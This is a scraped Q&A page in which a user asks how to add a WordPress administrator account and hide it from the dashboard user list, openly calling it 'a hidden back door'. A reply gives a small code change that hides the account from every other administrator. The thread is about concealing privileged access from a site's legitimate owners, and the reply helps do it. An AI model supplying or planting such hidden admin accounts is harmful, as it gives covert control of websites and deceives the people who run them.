Hide A Particular Admin Account From Wordpress User List

后端 未结 5 677
耶瑟儿~
耶瑟儿~ 2021-01-31 23:34

I\'d like to create an admin user in Wordpress and then hide it from the users list in the wordpress dashboard, as a kind of hidden back door. I am not trying to hide all admins

5条回答
  •  挽巷
    挽巷 (楼主)
    2021-02-01 00:06

    @Natalia - If you want to block all other admins to see your account, just change

    if ($username == '') { 
    

    with

    if ($username != '') { 
    

    This way you hide your account to all other accounts but yours.

提交回复
热议问题